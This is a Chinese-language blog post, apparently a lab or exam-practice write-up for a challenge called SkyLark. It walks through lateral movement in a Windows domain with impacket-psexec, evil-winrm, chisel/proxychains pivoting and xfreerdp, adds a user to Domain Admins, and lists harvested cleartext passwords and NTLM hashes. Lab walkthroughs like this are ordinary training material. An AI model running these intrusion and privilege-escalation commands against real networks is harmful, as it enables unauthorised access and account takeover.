Challenge 3 - SkyLark(4)

Challenge 3 - SkyLark(4)


已經拿到了 Domain Admin,目前對外的 192.168.x.x 網段還有兩台 Windows

直接選定 .220 為下一台目標



直接 impacket-psexec 進去,impacket-psexec skylark.com/backup_service:It4Server@192.168.196.220

這一台一樣有兩隻腳,與兩個 flag



DC 的名稱就叫做 DC


IP 是 10.10.156.250



更新攻擊列表與選定下一台直接進 DC 看看



搭建完 chisel socks 通道後直接 └─$ proxychains4 -q impacket-psexec backup_service:It4Server@10.10.156.250 

直接拿到兩個 flag


透過 DC 開始用 ping 執行基本網路列舉內網機器




順便加網域使用者 kiosk 到 Domain Admins 群組
指令 : net group "Domain Admins" kiosk /add /domain




然後匯入 PowerView.ps1,查看一下 Domain Admins 群組成員
Get-NetGroup "Domain Admins" | select member


檢查一下網卡,DC 僅有一張網路卡



DC C:\ 路徑下有一個 credentials.txt 的檔案,裡面找到兩組帳號密碼
 - PARIS: MusingExtraCounty98
 - SYDNEY: DowntownAbbey1923





administrator HASH 55375d3c25c50db8a6064014f092646d
密碼直接顯示如下 E2koUInnHx5_nrAjBouE


拿到 skylark Domain 中預設的 administrator 密碼了,測試看看
xfreerdp /v:192.168.224.220 /u:administrator /p:'E2koUInnHx5_nrAjBouE' /d:SKYLARK -drive:aries,/home/kali/lab3/220
可以 RDP 直接進 .220 了



更新帳號密碼表




更新攻擊列表如下並選定 10.10.x.11 為下一台



直接進去,└─$ proxychains4 -q evil-winrm -i 10.10.184.11 -u 'SKYLARK\administrator' -p 'E2koUInnHx5_nrAjBouE'

或是使用 └─$ proxychains4 -q impacket-psexec skylark.com/administrator:'E2koUInnHx5_nrAjBouE'@10.10.184.11

這一台僅有 proof.txt



.11 本機 administrator HASH c4468acfbf7d29c74c590b01282f88d3



c:\ 有個 backup 資料夾,裡面有兩個檔案 file.txt & ftp1.txt



fule.txt 裡面又找到一組帳號密碼用於 Skylark Partner portnal

skylark:User+dcGvfwTbjV[]

以及在 ftp1.log 中發現 FTP 帳號密碼 ftp_jp:~be<3@6fe1Z:2e8



更新帳號密碼表



更新攻擊列表並選定下一台機器 .13



直接進去,└─$ proxychains4 -q evil-winrm -i 10.10.184.13 -u 'SKYLARK\administrator' -p 'E2koUInnHx5_nrAjBouE'

或是使用 └─$ proxychains4 -q impacket-psexec skylark.com/administrator:'E2koUInnHx5_nrAjBouE'@10.10.184.13

這一台僅有 proof.txt



發現有跑郵件服務,還有兩個網段目前無法存取,該不會要用寄信的梗吧

目前也不知道要寄信給誰,先暫時放著等找到再來說



透過有兩隻腳的 .220 安裝 Windows Port Scan 工具掃描內網的 .10 & .12

.10 僅有開兩個 Port,22 & 5901



.12 開的 Port,22、139、445、8080



更新攻擊列表如下




留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

Challenge 0 - Secura(1)

Challenge 8 - Poseidon(0)